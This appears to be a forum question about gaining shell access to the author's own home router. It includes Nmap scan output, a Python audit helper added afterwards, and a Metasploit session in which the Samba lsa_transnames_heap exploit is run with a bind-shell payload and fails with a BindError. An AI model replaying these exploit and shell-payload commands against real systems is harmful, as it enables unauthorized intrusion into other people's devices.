I'm trying to gain shell access to my home router/gateway, so I decided to use Metasploit and Nmap to find if there were any vulnerabilities that I could use:
[marcel@GLaDOS ~]$ sudo nmap -sS -Pn -A 192.168.2.1
Starting Nmap 7.50 ( https://nmap.org ) at 2017-06-21 14:30 EDT
Nmap scan report for mynetwork (192.168.2.1)
Host is up (0.012s latency).
Not shown: 844 closed ports, 148 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.55
| dns-nsid:
|_ bind.version: dnsmasq-2.55
80/tcp open http lighttpd
|_http-server-header: HTTP Server
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http lighttpd
|_http-server-header: HTTP Server
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=self-signedKey/organizationName=Sagemcom Ca/countryName=FR
| Not valid before: 2011-10-14T12:32:29
|_Not valid after: 2111-09-20T12:32:29
|_ssl-date: 2017-06-21T18:33:31+00:00; +14s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.0.24 (workgroup: WORKGROUP)
1080/tcp open socks?
| fingerprint-strings:
| GenericLines, HTTPOptions, RTSPRequest, SIPOptions, Socks5:
| HTTP/1.1 200 BAD_REQUEST_400
| Server: CPE-iTrace-Server-1.7b
| Content-Type: text/html
| Transfer-Encoding: chunked
|_ Connection: close
9000/tcp open upnp TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0)
49152/tcp open upnp Portable SDK for UPnP devices 1.6.18 (Linux 2.6.28.8; UPnP 1.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 40:F2:01:EE:09:CD (Sagemcom Broadband SAS)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:linux:linux_kernel:2.6.28.8
Host script results:
|_clock-skew: mean: 13s, deviation: 0s, median: 13s
|_nbstat: NetBIOS name: SAGEMCOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.24)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-06-21T14:33:31-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: share (dangerous)
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 12.11 ms mynetwork (192.168.2.1)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.68 seconds
I found out that the router is running Linux and using Samba 3.0.24, which is fairly old. I then found this Metasploit exploit which I thought could work: https://www.exploit-db.com/exploits/16859/
msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.2.1
RHOST => 192.168.2.1
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] 192.168.2.1:445 - Creating nop sled....
[*] 192.168.2.1:445 - Trying to exploit Samba with address 0xffffe410...
[*] 192.168.2.1:445 - Connecting to the SMB service...
[*] 192.168.2.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.2.1[\lsarpc] ...
[-] 192.168.2.1:445 - Exploit failed: Rex::Proto::DCERPC::Exceptions::BindError Failed to bind. Could not bind to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.2.1[\lsarpc]
[*] Exploit completed, but no session was created.
Unfortunately, I'm getting a BindError, and I can't seem to figure out the problem. If anybody could help me fix it or understand it further, that would be great!
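
Added example, not part of the original post: a small Python audit helper that reads Nmap normal-format output like the scan above and lists the open services together with the settings Nmap's own scripts flag as dangerous. The sample is an excerpt of the post's scan with column spacing restored; `parse_nmap` and the regexes are illustrative names, not part of Nmap.

```python
import re

# Excerpt of the scan output quoted in the post (whitespace restored by hand).
SAMPLE = """\
PORT      STATE SERVICE     VERSION
53/tcp    open  domain      dnsmasq 2.55
80/tcp    open  http        lighttpd
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.24 (workgroup: WORKGROUP)
1080/tcp  open  socks?
49152/tcp open  upnp        Portable SDK for UPnP devices 1.6.18 (Linux 2.6.28.8; UPnP 1.0)
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: share (dangerous)
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|[_ ]?\s*([\w-]+):\s*(.*)$")

def parse_nmap(text):
    """Return (open_services, findings) from Nmap normal-format output."""
    services, findings = [], []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, name, version = m.groups()
            services.append({"port": int(port), "proto": proto,
                             "service": name, "version": version.strip()})
            continue
        m = SCRIPT_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        # Nmap's NSE scripts tag risky settings with the word "dangerous".
        if "dangerous" in value:
            findings.append(f"{key}: {value}")
        elif key == "smbv2-enabled" and "doesn't support" in value:
            findings.append("SMBv1 only: " + value)
    return services, findings

if __name__ == "__main__":
    services, findings = parse_nmap(SAMPLE)
    for s in services:
        print(f"{s['port']}/{s['proto']:<4} {s['service']:<12} {s['version']}")
    for f in findings:
        print("FLAG:", f)
```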